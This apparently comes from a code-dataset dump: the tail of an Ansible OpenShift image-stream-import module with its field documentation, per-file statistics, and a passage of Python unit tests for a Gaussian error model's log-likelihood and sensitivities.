contains: str, str
cluster_name:
description:
- The name of the cluster which the object belongs to. This
is used to distinguish resources with same name and namespace
in different clusters. This field is not set anywhere
right now and apiserver is going to ignore it if set in
create or update request.
type: str
creation_timestamp:
description:
- CreationTimestamp is a timestamp representing the server
time when this object was created. It is not guaranteed
to be set in happens-before order across separate operations.
Clients may not set this value. It is represented in RFC3339
form and is in UTC. Populated by the system. Read-only.
Null for lists.
type: complex
contains: {}
deletion_grace_period_seconds:
description:
- Number of seconds allowed for this object to gracefully
terminate before it will be removed from the system. Only
set when deletionTimestamp is also set. May only be shortened.
Read-only.
type: int
deletion_timestamp:
description:
- DeletionTimestamp is RFC 3339 date and time at which this
resource will be deleted. This field is set by the server
when a graceful deletion is requested by the user, and
is not directly settable by a client. The resource is
expected to be deleted (no longer visible from resource
lists, and not reachable by name) after the time in this
field. Once set, this value may not be unset or be set
further into the future, although it may be shortened
or the resource may be deleted prior to this time. For
example, a user may request that a pod is deleted in 30
seconds. The Kubelet will react by sending a graceful
termination signal to the containers in the pod. After
that 30 seconds, the Kubelet will send a hard termination
signal (SIGKILL) to the container and after cleanup, remove
the pod from the API. In the presence of network partitions,
this object may still exist after this timestamp, until
an administrator or automated process can determine the
resource is fully terminated. If not set, graceful deletion
of the object has not been requested. Populated by the
system when a graceful deletion is requested. Read-only.
type: complex
contains: {}
finalizers:
description:
- Must be empty before the object is deleted from the registry.
Each entry is an identifier for the responsible component
that will remove the entry from the list. If the deletionTimestamp
of the object is non-nil, entries in this list can only
be removed.
type: list
contains: str
generate_name:
description:
- GenerateName is an optional prefix, used by the server,
to generate a unique name ONLY IF the Name field has not
been provided. If this field is used, the name returned
to the client will be different than the name passed.
This value will also be combined with a unique suffix.
The provided value has the same validation rules as the
Name field, and may be truncated by the length of the
suffix required to make the value unique on the server.
If this field is specified and the generated name exists,
the server will NOT return a 409 - instead, it will either
return 201 Created or 500 with Reason ServerTimeout indicating
a unique name could not be found in the time allotted,
and the client should retry (optionally after the time
indicated in the Retry-After header). Applied only if
Name is not specified.
type: str
generation:
description:
- A sequence number representing a specific generation of
the desired state. Populated by the system. Read-only.
type: int
labels:
description:
- Map of string keys and values that can be used to organize
and categorize (scope and select) objects. May match selectors
of replication controllers and services.
type: complex
contains: str, str
name:
description:
- Name must be unique within a namespace. Is required when
creating resources, although some resources may allow
a client to request the generation of an appropriate name
automatically. Name is primarily intended for creation
idempotence and configuration definition. Cannot be updated.
type: str
namespace:
description:
- Namespace defines the space within each name must be unique.
An empty namespace is equivalent to the "default" namespace,
but "default" is the canonical representation. Not all
objects are required to be scoped to a namespace - the
value of this field for those objects will be empty. Must
be a DNS_LABEL. Cannot be updated.
type: str
owner_references:
description:
- List of objects depended by this object. If ALL objects
in the list have been deleted, this object will be garbage
collected. If this object is managed by a controller,
then an entry in this list will point to this controller,
with the controller field set to true. There cannot be
more than one managing controller.
type: list
contains:
api_version:
description:
- API version of the referent.
type: str
controller:
description:
- If true, this reference points to the managing controller.
type: bool
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
uid:
description:
- UID of the referent.
type: str
resource_version:
description:
- An opaque value that represents the internal version of
this object that can be used by clients to determine when
objects have changed. May be used for optimistic concurrency,
change detection, and the watch operation on a resource
or set of resources. Clients must treat these values as
opaque and passed unmodified back to the server. They
may only be valid for a particular resource or set of
resources. Populated by the system. Read-only. Value must
be treated as opaque by clients and .
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated
by the system. Read-only.
type: str
uid:
description:
- UID is the unique in time and space value for this object.
It is typically generated by the server on successful
creation of a resource and is not allowed to change on
PUT operations. Populated by the system. Read-only.
type: str
signed_claims:
description:
- Contains claims from the signature.
type: complex
contains: str, str
type:
description:
- 'Required: Describes a type of stored blob.'
type: str
status:
description:
- Status is the status of the image import, including errors encountered
while retrieving the image
type: complex
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation
of an object. Servers should convert recognized schemas to the
latest internal value, and may reject unrecognized values.
type: str
code:
description:
- Suggested HTTP return code for this status, 0 if not set.
type: int
details:
description:
- Extended data associated with the reason. Each reason may define
its own extended details. This field is optional and the data
returned is not guaranteed to conform to any schema except that
defined by the reason type.
type: complex
contains:
causes:
description:
- The Causes array includes more details associated with the
StatusReason failure. Not all StatusReasons may provide detailed
causes.
type: list
contains:
field:
description:
- 'The field of the resource that has caused this error,
as named by its JSON serialization. May include dot and
postfix notation for nested attributes. Arrays are zero-indexed.
Fields may appear more than once in an array of causes
due to fields having multiple errors. Optional. Examples:
"name" - the field "name" on the current resource "items[0].name"
- the field "name" on the first array entry in "items"'
type: str
message:
description:
- A human-readable description of the cause of the error.
This field may be presented as-is to a reader.
type: str
reason:
description:
- A machine-readable description of the cause of the error.
If this value is empty there is no information available.
type: str
group:
description:
- The group attribute of the resource associated with the status
StatusReason.
type: str
kind:
description:
- The kind attribute of the resource associated with the status
StatusReason. On some operations may differ from the requested
resource Kind.
type: str
name:
description:
- The name attribute of the resource associated with the status
StatusReason (when there is a single name which can be described).
type: str
retry_after_seconds:
description:
- If specified, the time in seconds before the operation should
be retried.
type: int
kind:
description:
- Kind is a string value representing the REST resource this object
represents. Servers may infer this from the endpoint the client
submits requests to. Cannot be updated. In CamelCase.
type: str
message:
description:
- A human-readable description of the status of this operation.
type: str
metadata:
description:
- Standard list metadata.
type: complex
contains:
resource_version:
description:
- String that identifies the server's internal version of this
object that can be used by clients to determine when objects
have changed. Value must be treated as opaque by clients and
passed unmodified back to the server. Populated by the system.
Read-only.
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated by the
system. Read-only.
type: str
reason:
description:
- A machine-readable description of why this operation is in the
"Failure" status. If this value is empty there is no information
available. A Reason clarifies an HTTP status code but does not
override it.
type: str
status:
description:
- 'Status of the operation. One of: "Success" or "Failure".'
type: str
tag:
description:
- Tag is the tag this image was located under, if any
type: str
repository:
description:
- Repository is set if spec.repository was set to the outcome of the import
type: complex
contains:
additional_tags:
description:
- AdditionalTags are tags that exist in the repository but were not
imported because a maximum limit of automatic imports was applied.
type: list
contains: str
images:
description:
- Images is a list of images successfully retrieved by the import of
the repository.
type: list
contains:
image:
description:
- Image is the metadata of that image, if the image was located
type: complex
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation
of an object. Servers should convert recognized schemas to
the latest internal value, and may reject unrecognized values.
type: str
docker_image_config:
description:
- DockerImageConfig is a JSON blob that the runtime uses to
set up the container. This is a part of manifest schema v2.
type: str
docker_image_layers:
description:
- DockerImageLayers represents the layers in the image. May
not be set if the image does not define that data.
type: list
contains:
media_type:
description:
- MediaType of the referenced object.
type: str
name:
description:
- Name of the layer as defined by the underlying store.
type: str
size:
description:
- Size of the layer in bytes as defined by the underlying
store.
type: int
docker_image_manifest:
description:
- DockerImageManifest is the raw JSON of the manifest
type: str
docker_image_manifest_media_type:
description:
- DockerImageManifestMediaType specifies the mediaType of manifest.
This is a part of manifest schema v2.
type: str
docker_image_metadata:
description:
- DockerImageMetadata contains metadata about this image
type: complex
contains:
raw:
description:
- Raw is the underlying serialization of this object.
type: str
docker_image_metadata_version:
description:
- DockerImageMetadataVersion conveys the version of the object,
which if empty defaults to "1.0"
type: str
docker_image_reference:
description:
- DockerImageReference is the string that can be used to pull
this image.
type: str
docker_image_signatures:
description:
- DockerImageSignatures provides the signatures as opaque blobs.
This is a part of manifest schema v1.
type: list
contains: str
kind:
description:
- Kind is a string value representing the REST resource this
object represents. Servers may infer this from the endpoint
the client submits requests to. Cannot be updated. In CamelCase.
type: str
metadata:
description:
- Standard object's metadata.
type: complex
contains:
annotations:
description:
- Annotations is an unstructured key value map stored with
a resource that may be set by external tools to store
and retrieve arbitrary metadata. They are not queryable
and should be preserved when modifying objects.
type: complex
contains: str, str
cluster_name:
description:
- The name of the cluster which the object belongs to. This
is used to distinguish resources with same name and namespace
in different clusters. This field is not set anywhere
right now and apiserver is going to ignore it if set in
create or update request.
type: str
creation_timestamp:
description:
- CreationTimestamp is a timestamp representing the server
time when this object was created. It is not guaranteed
to be set in happens-before order across separate operations.
Clients may not set this value. It is represented in RFC3339
form and is in UTC. Populated by the system. Read-only.
Null for lists.
type: complex
contains: {}
deletion_grace_period_seconds:
description:
- Number of seconds allowed for this object to gracefully
terminate before it will be removed from the system. Only
set when deletionTimestamp is also set. May only be shortened.
Read-only.
type: int
deletion_timestamp:
description:
- DeletionTimestamp is RFC 3339 date and time at which this
resource will be deleted. This field is set by the server
when a graceful deletion is requested by the user, and
is not directly settable by a client. The resource is
expected to be deleted (no longer visible from resource
lists, and not reachable by name) after the time in this
field. Once set, this value may not be unset or be set
further into the future, although it may be shortened
or the resource may be deleted prior to this time. For
example, a user may request that a pod is deleted in 30
seconds. The Kubelet will react by sending a graceful
termination signal to the containers in the pod. After
that 30 seconds, the Kubelet will send a hard termination
signal (SIGKILL) to the container and after cleanup, remove
the pod from the API. In the presence of network partitions,
this object may still exist after this timestamp, until
an administrator or automated process can determine the
resource is fully terminated. If not set, graceful deletion
of the object has not been requested. Populated by the
system when a graceful deletion is requested. Read-only.
type: complex
contains: {}
finalizers:
description:
- Must be empty before the object is deleted from the registry.
Each entry is an identifier for the responsible component
that will remove the entry from the list. If the deletionTimestamp
of the object is non-nil, entries in this list can only
be removed.
type: list
contains: str
generate_name:
description:
- GenerateName is an optional prefix, used by the server,
to generate a unique name ONLY IF the Name field has not
been provided. If this field is used, the name returned
to the client will be different than the name passed.
This value will also be combined with a unique suffix.
The provided value has the same validation rules as the
Name field, and may be truncated by the length of the
suffix required to make the value unique on the server.
If this field is specified and the generated name exists,
the server will NOT return a 409 - instead, it will either
return 201 Created or 500 with Reason ServerTimeout indicating
a unique name could not be found in the time allotted,
and the client should retry (optionally after the time
indicated in the Retry-After header). Applied only if
Name is not specified.
type: str
generation:
description:
- A sequence number representing a specific generation of
the desired state. Populated by the system. Read-only.
type: int
labels:
description:
- Map of string keys and values that can be used to organize
and categorize (scope and select) objects. May match selectors
of replication controllers and services.
type: complex
contains: str, str
name:
description:
- Name must be unique within a namespace. Is required when
creating resources, although some resources may allow
a client to request the generation of an appropriate name
automatically. Name is primarily intended for creation
idempotence and configuration definition. Cannot be updated.
type: str
namespace:
description:
- Namespace defines the space within each name must be unique.
An empty namespace is equivalent to the "default" namespace,
but "default" is the canonical representation. Not all
objects are required to be scoped to a namespace - the
value of this field for those objects will be empty. Must
be a DNS_LABEL. Cannot be updated.
type: str
owner_references:
description:
- List of objects depended by this object. If ALL objects
in the list have been deleted, this object will be garbage
collected. If this object is managed by a controller,
then an entry in this list will point to this controller,
with the controller field set to true. There cannot be
more than one managing controller.
type: list
contains:
api_version:
description:
- API version of the referent.
type: str
controller:
description:
- If true, this reference points to the managing controller.
type: bool
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
uid:
description:
- UID of the referent.
type: str
resource_version:
description:
- An opaque value that represents the internal version of
this object that can be used by clients to determine when
objects have changed. May be used for optimistic concurrency,
change detection, and the watch operation on a resource
or set of resources. Clients must treat these values as
opaque and passed unmodified back to the server. They
may only be valid for a particular resource or set of
resources. Populated by the system. Read-only. Value must
be treated as opaque by clients and .
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated
by the system. Read-only.
type: str
uid:
description:
- UID is the unique in time and space value for this object.
It is typically generated by the server on successful
creation of a resource and is not allowed to change on
PUT operations. Populated by the system. Read-only.
type: str
signatures:
description:
- Signatures holds all signatures of the image.
type: list
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation
of an object. Servers should convert recognized schemas
to the latest internal value, and may reject unrecognized
values.
type: str
conditions:
description:
- Conditions represent the latest available observations
of a signature's current state.
type: list
contains:
last_probe_time:
description:
- Last time the condition was checked.
type: complex
contains: {}
last_transition_time:
description:
- Last time the condition transit from one status to
another.
type: complex
contains: {}
message:
description:
- Human readable message indicating details about last
transition.
type: str
reason:
description:
- (brief) reason for the condition's last transition.
type: str
status:
description:
- Status of the condition, one of True, False, Unknown.
type: str
type:
description:
- Type of signature condition, Complete or Failed.
type: str
content:
description:
- "Required: An opaque binary string which is an image's\
\ signature."
type: str
created:
description:
- If specified, it is the time of signature's creation.
type: complex
contains: {}
image_identity:
description:
- A human readable string representing image's identity.
It could be a product name and version, or an image pull
spec (e.g. "registry.access.redhat.com/rhel7/rhel:7.2").
type: str
issued_by:
description:
- If specified, it holds information about an issuer of
signing certificate or key (a person or entity who signed
the signing certificate or key).
type: complex
contains:
common_name:
description:
- Common name (e.g. openshift-signing-service).
type: str
organization:
description:
- Organization name.
type: str
issued_to:
description:
- If specified, it holds information about a subject of
signing certificate or key (a person or entity who signed
the image).
type: complex
contains:
common_name:
description:
- Common name (e.g. openshift-signing-service).
type: str
organization:
description:
- Organization name.
type: str
public_key_id:
description:
- If present, it is a human readable key id of public
key belonging to the subject used to verify image
signature. It should contain at least 64 lowest bits
of public key's fingerprint (e.g. 0x685ebe62bf278440).
type: str
kind:
description:
- Kind is a string value representing the REST resource
this object represents. Servers may infer this from the
endpoint the client submits requests to. Cannot be updated.
In CamelCase.
type: str
metadata:
description:
- Standard object's metadata.
type: complex
contains:
annotations:
description:
- Annotations is an unstructured key value map stored
with a resource that may be set by external tools
to store and retrieve arbitrary metadata. They are
not queryable and should be preserved when modifying
objects.
type: complex
contains: str, str
cluster_name:
description:
- The name of the cluster which the object belongs to.
This is used to distinguish resources with same name
and namespace in different clusters. This field is
not set anywhere right now and apiserver is going
to ignore it if set in create or update request.
type: str
creation_timestamp:
description:
- CreationTimestamp is a timestamp representing the
server time when this object was created. It is not
guaranteed to be set in happens-before order across
separate operations. Clients may not set this value.
It is represented in RFC3339 form and is in UTC. Populated
by the system. Read-only. Null for lists.
type: complex
contains: {}
deletion_grace_period_seconds:
description:
- Number of seconds allowed for this object to gracefully
terminate before it will be removed from the system.
Only set when deletionTimestamp is also set. May only
be shortened. Read-only.
type: int
deletion_timestamp:
description:
- DeletionTimestamp is RFC 3339 date and time at which
this resource will be deleted. This field is set by
the server when a graceful deletion is requested by
the user, and is not directly settable by a client.
The resource is expected to be deleted (no longer
visible from resource lists, and not reachable by
name) after the time in this field. Once set, this
value may not be unset or be set further into the
future, although it may be shortened or the resource
may be deleted prior to this time. For example, a
user may request that a pod is deleted in 30 seconds.
The Kubelet will react by sending a graceful termination
signal to the containers in the pod. After that 30
seconds, the Kubelet will send a hard termination
signal (SIGKILL) to the container and after cleanup,
remove the pod from the API. In the presence of network
partitions, this object may still exist after this
timestamp, until an administrator or automated process
can determine the resource is fully terminated. If
not set, graceful deletion of the object has not been
requested. Populated by the system when a graceful
deletion is requested. Read-only.
type: complex
contains: {}
finalizers:
description:
- Must be empty before the object is deleted from the
registry. Each entry is an identifier for the responsible
component that will remove the entry from the list.
If the deletionTimestamp of the object is non-nil,
entries in this list can only be removed.
type: list
contains: str
generate_name:
description:
- GenerateName is an optional prefix, used by the server,
to generate a unique name ONLY IF the Name field has
not been provided. If this field is used, the name
returned to the client will be different than the
name passed. This value will also be combined with
a unique suffix. The provided value has the same validation
rules as the Name field, and may be truncated by the
length of the suffix required to make the value unique
on the server. If this field is specified and the
generated name exists, the server will NOT return
a 409 - instead, it will either return 201 Created
or 500 with Reason ServerTimeout indicating a unique
name could not be found in the time allotted, and
the client should retry (optionally after the time
indicated in the Retry-After header). Applied only
if Name is not specified.
type: str
generation:
description:
- A sequence number representing a specific generation
of the desired state. Populated by the system. Read-only.
type: int
labels:
description:
- Map of string keys and values that can be used to
organize and categorize (scope and select) objects.
May match selectors of replication controllers and
services.
type: complex
contains: str, str
name:
description:
- Name must be unique within a namespace. Is required
when creating resources, although some resources may
allow a client to request the generation of an appropriate
name automatically. Name is primarily intended for
creation idempotence and configuration definition.
Cannot be updated.
type: str
namespace:
description:
- Namespace defines the space within each name must
be unique. An empty namespace is equivalent to the
"default" namespace, but "default" is the canonical
representation. Not all objects are required to be
scoped to a namespace - the value of this field for
those objects will be empty. Must be a DNS_LABEL.
Cannot be updated.
type: str
owner_references:
description:
- List of objects depended by this object. If ALL objects
in the list have been deleted, this object will be
garbage collected. If this object is managed by a
controller, then an entry in this list will point
to this controller, with the controller field set
to true. There cannot be more than one managing controller.
type: list
contains:
api_version:
description:
- API version of the referent.
type: str
controller:
description:
- If true, this reference points to the managing
controller.
type: bool
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
uid:
description:
- UID of the referent.
type: str
resource_version:
description:
- An opaque value that represents the internal version
of this object that can be used by clients to determine
when objects have changed. May be used for optimistic
concurrency, change detection, and the watch operation
on a resource or set of resources. Clients must treat
these values as opaque and passed unmodified back
to the server. They may only be valid for a particular
resource or set of resources. Populated by the system.
Read-only. Value must be treated as opaque by clients
and .
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated
by the system. Read-only.
type: str
uid:
description:
- UID is the unique in time and space value for this
object. It is typically generated by the server on
successful creation of a resource and is not allowed
to change on PUT operations. Populated by the system.
Read-only.
type: str
signed_claims:
description:
- Contains claims from the signature.
type: complex
contains: str, str
type:
description:
- 'Required: Describes a type of stored blob.'
type: str
status:
description:
- Status is the status of the image import, including errors encountered
while retrieving the image
type: complex
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation
of an object. Servers should convert recognized schemas to
the latest internal value, and may reject unrecognized values.
type: str
code:
description:
- Suggested HTTP return code for this status, 0 if not set.
type: int
details:
description:
- Extended data associated with the reason. Each reason may
define its own extended details. This field is optional and
the data returned is not guaranteed to conform to any schema
except that defined by the reason type.
type: complex
contains:
causes:
description:
- The Causes array includes more details associated with
the StatusReason failure. Not all StatusReasons may provide
detailed causes.
type: list
contains:
field:
description:
- 'The field of the resource that has caused this error,
as named by its JSON serialization. May include dot
and postfix notation for nested attributes. Arrays
are zero-indexed. Fields may appear more than once
in an array of causes due to fields having multiple
errors. Optional. Examples: "name" - the field "name"
on the current resource "items[0].name" - the field
"name" on the first array entry in "items"'
type: str
message:
description:
- A human-readable description of the cause of the error.
This field may be presented as-is to a reader.
type: str
reason:
description:
- A machine-readable description of the cause of the
error. If this value is empty there is no information
available.
type: str
group:
description:
- The group attribute of the resource associated with the
status StatusReason.
type: str
kind:
description:
- The kind attribute of the resource associated with the
status StatusReason. On some operations may differ from
the requested resource Kind.
type: str
name:
description:
- The name attribute of the resource associated with the
status StatusReason (when there is a single name which
can be described).
type: str
retry_after_seconds:
description:
- If specified, the time in seconds before the operation
should be retried.
type: int
kind:
description:
- Kind is a string value representing the REST resource this
object represents. Servers may infer this from the endpoint
the client submits requests to. Cannot be updated. In CamelCase.
type: str
message:
description:
- A human-readable description of the status of this operation.
type: str
metadata:
description:
- Standard list metadata.
type: complex
contains:
resource_version:
description:
- String that identifies the server's internal version of
this object that can be used by clients to determine when
objects have changed. Value must be treated as opaque
by clients and passed unmodified back to the server. Populated
by the system. Read-only.
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated
by the system. Read-only.
type: str
reason:
description:
- A machine-readable description of why this operation is in
the "Failure" status. If this value is empty there is no information
available. A Reason clarifies an HTTP status code but does
not override it.
type: str
status:
description:
- 'Status of the operation. One of: "Success" or "Failure".'
type: str
tag:
description:
- Tag is the tag this image was located under, if any
type: str
status:
description:
- Status reflects whether any failure occurred during import
type: complex
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation
of an object. Servers should convert recognized schemas to the
latest internal value, and may reject unrecognized values.
type: str
code:
description:
- Suggested HTTP return code for this status, 0 if not set.
type: int
details:
description:
- Extended data associated with the reason. Each reason may define
its own extended details. This field is optional and the data
returned is not guaranteed to conform to any schema except that
defined by the reason type.
type: complex
contains:
causes:
description:
- The Causes array includes more details associated with the
StatusReason failure. Not all StatusReasons may provide detailed
causes.
type: list
contains:
field:
description:
- 'The field of the resource that has caused this error,
as named by its JSON serialization. May include dot and
postfix notation for nested attributes. Arrays are zero-indexed.
Fields may appear more than once in an array of causes
due to fields having multiple errors. Optional. Examples:
"name" - the field "name" on the current resource "items[0].name"
- the field "name" on the first array entry in "items"'
type: str
message:
description:
- A human-readable description of the cause of the error.
This field may be presented as-is to a reader.
type: str
reason:
description:
- A machine-readable description of the cause of the error.
If this value is empty there is no information available.
type: str
group:
description:
- The group attribute of the resource associated with the status
StatusReason.
type: str
kind:
description:
- The kind attribute of the resource associated with the status
StatusReason. On some operations may differ from the requested
resource Kind.
type: str
name:
description:
- The name attribute of the resource associated with the status
StatusReason (when there is a single name which can be described).
type: str
retry_after_seconds:
description:
- If specified, the time in seconds before the operation should
be retried.
type: int
kind:
description:
- Kind is a string value representing the REST resource this object
represents. Servers may infer this from the endpoint the client
submits requests to. Cannot be updated. In CamelCase.
type: str
message:
description:
- A human-readable description of the status of this operation.
type: str
metadata:
description:
- Standard list metadata.
type: complex
contains:
resource_version:
description:
- String that identifies the server's internal version of this
object that can be used by clients to determine when objects
have changed. Value must be treated as opaque by clients and
passed unmodified back to the server. Populated by the system.
Read-only.
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated by the
system. Read-only.
type: str
reason:
description:
- A machine-readable description of why this operation is in the
"Failure" status. If this value is empty there is no information
available. A Reason clarifies an HTTP status code but does not
override it.
type: str
status:
description:
- 'Status of the operation. One of: "Success" or "Failure".'
type: str
'''
def main():
try:
module = OpenShiftAnsibleModule('image_stream_import', 'V1')
except OpenShiftAnsibleException as exc:
# The helper failed to init, so there is no module object. All we can do is raise the error.
raise Exception(exc.message)
try:
module.execute_module()
except OpenShiftAnsibleException as exc:
module.fail_json(msg="Module failed!", error=str(exc))
if __name__ == '__main__':
main()
| 52.748223
| 105
| 0.487207
| 12,096
| 126,121
| 5.054729
| 0.058036
| 0.022211
| 0.023306
| 0.013739
| 0.929917
| 0.922884
| 0.914576
| 0.912515
| 0.910045
| 0.906644
| 0
| 0.003041
| 0.486422
| 126,121
| 2,390
| 106
| 52.770293
| 0.940901
| 0.00088
| 0
| 0.737705
| 0
| 0.002102
| 0.996095
| 0.015499
| 0
| 0
| 0.000286
| 0
| 0
| 1
| 0.00042
| false
| 0.008827
| 0.022699
| 0
| 0.02438
| 0.000841
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
98e1b675f5e8a4b54170f62d19df182b0bd3f2cc
| 56,910
|
py
|
Python
|
chi/tests/test_error_models.py
|
Lethay/chi
|
2182d8f9d54878b3f27670b157593f5a3bf9df4a
|
[
"BSD-3-Clause"
] | 2
|
2021-12-09T17:35:36.000Z
|
2022-03-17T13:45:06.000Z
|
chi/tests/test_error_models.py
|
Lethay/chi
|
2182d8f9d54878b3f27670b157593f5a3bf9df4a
|
[
"BSD-3-Clause"
] | 30
|
2021-07-30T08:55:17.000Z
|
2022-03-21T21:55:54.000Z
|
chi/tests/test_error_models.py
|
Lethay/chi
|
2182d8f9d54878b3f27670b157593f5a3bf9df4a
|
[
"BSD-3-Clause"
] | 2
|
2021-08-04T15:07:21.000Z
|
2021-12-15T11:42:31.000Z
|
#
# This file is part of the chi repository
# (https://github.com/DavAug/chi/) which is released under the
# BSD 3-clause license. See accompanying LICENSE.md for copyright notice and
# full license details.
#
import unittest
import numpy as np
import chi
class TestConstantAndMultiplicativeGaussianErrorModel(unittest.TestCase):
"""
Tests the chi.ConstantAndMultiplicativeGaussianErrorModel class.
"""
@classmethod
def setUpClass(cls):
cls.error_model = chi.ConstantAndMultiplicativeGaussianErrorModel()
def test_compute_log_likelihood(self):
# Tests :meth:`compute_log_likelihood` and
# :meth:`compute_pointwise_ll`
# Test case I: If X = X^m, the score reduces to
# -np.log(2pi)/2 - np.log(sigma_tot)
# Test case I.1:
parameters = [1, 0.1]
model_output = [1] * 10
observations = [1] * 10
ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(1 + 0.1 * 1)
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case I.2:
parameters = [1, 0.1]
model_output = [10] * 10
observations = [10] * 10
ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(1 + 0.1 * 10)
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case II: If sigma_tot = 1, the score reduces to
# -np.log(2pi)/2 - (X-X^m) / 2
# Test case II.1:
parameters = [0.9, 0.1]
model_output = [1] * 6
observations = [2] * 6
ref_score = -3 * np.log(2 * np.pi) - 6 * (1 - 2)**2 / 2
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (6,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case II.2:
parameters = [0.9, 0.1]
model_output = [1] * 10
observations = [10] * 10
ref_score = -5 * np.log(2 * np.pi) - 10 * (1 - 10)**2 / 2
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case III: -Infinity for not allowed regimes
# Test case III.1: Zero sigma_base
parameters = [0, 0.1]
model_output = [1] * 10
observations = [1] * 10
ref_score = -np.inf
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case III.2: Negative sigma_base
parameters = [-1, 0.1]
model_output = [1] * 10
observations = [1] * 10
ref_score = -np.inf
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case III.3: Zero sigma_rel
parameters = [1, 0]
model_output = [1] * 10
observations = [1] * 10
ref_score = -np.inf
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
# Test case III.4: Negative sigma_rel
parameters = [1, -1]
model_output = [1] * 10
observations = [1] * 10
ref_score = -np.inf
pw_score = self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
score = self.error_model.compute_log_likelihood(
parameters, model_output, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(pw_score.shape, (10,))
self.assertAlmostEqual(np.sum(pw_score), score)
def test_compute_log_likelihood_bad_input(self):
# Model output and observations don't match
parameters = [1, 0.1]
model_output = ['some', 'length']
observations = ['some', 'other', 'length']
with self.assertRaisesRegex(ValueError, 'The number of model outputs'):
self.error_model.compute_log_likelihood(
parameters, model_output, observations)
with self.assertRaisesRegex(ValueError, 'The number of model outputs'):
self.error_model.compute_pointwise_ll(
parameters, model_output, observations)
def test_compute_sensitivities(self):
# Test case I: If X = X^m, the scores reduce to
# L = -np.log(2pi)/2 - np.log(sigma_tot)
# dL/dpsi = -sigma_rel/sigma_tot * dx/dpsi
# dL/dsigma_base = -1/sigma_tot
# dL/dsigma_rel = -x/sigma_tot
# Test case I.1:
parameters = [1, 0.1]
model_output = [1] * 10
observations = [1] * 10
sens = np.array([[1] * 10, [2] * 10]).T
ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(1 + 0.1 * 1)
ref_dpsi_0 = -10 * 0.1 / (1 + 0.1) * 1
ref_dpsi_1 = -10 * 0.1 / (1 + 0.1) * 2
ref_dsigma_base = -10 / (1 + 0.1)
ref_dsigma_rel = -10 / (1 + 0.1) * 1
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(len(sens), 4)
self.assertAlmostEqual(sens[0], ref_dpsi_0)
self.assertAlmostEqual(sens[1], ref_dpsi_1)
self.assertAlmostEqual(sens[2], ref_dsigma_base)
self.assertAlmostEqual(sens[3], ref_dsigma_rel)
# Test case I.2:
parameters = [1, 0.1]
model_output = [10] * 10
observations = [10] * 10
sens = np.array([[1] * 10, [2] * 10]).T
ref_score = -5 * np.log(2 * np.pi) - 10 * np.log(1 + 0.1 * 10)
ref_dpsi_0 = -10 * 0.1 / (1 + 1) * 1
ref_dpsi_1 = -10 * 0.1 / (1 + 1) * 2
ref_dsigma_base = -10 / (1 + 1)
ref_dsigma_rel = -10 / (1 + 1) * 10
score, sens = self.error_model.compute_sensitivities(
parameters, model_output, sens, observations)
self.assertAlmostEqual(score, ref_score)
self.assertEqual(len(sens), 4)
self.assertAlmostEqual(sens[0], ref_dpsi_0)
self.assertAlmostEqual(sens[1], ref_dpsi_1)
self.assertAlmostEqual(sens[2], ref_dsigma_base)
self.assertAlmostEqual(sens[3], ref_dsigma_rel)
# Test case II: If sigma_tot = 1, the scores reduce to
# L = -np.log(2pi)/2 - (X-X^m) / 2
# dL/dpsi = (-sigma_rel + error + error^2*sigma_rel) * dx/dpsi
# dL/dsigma_base = - 1 + error^2
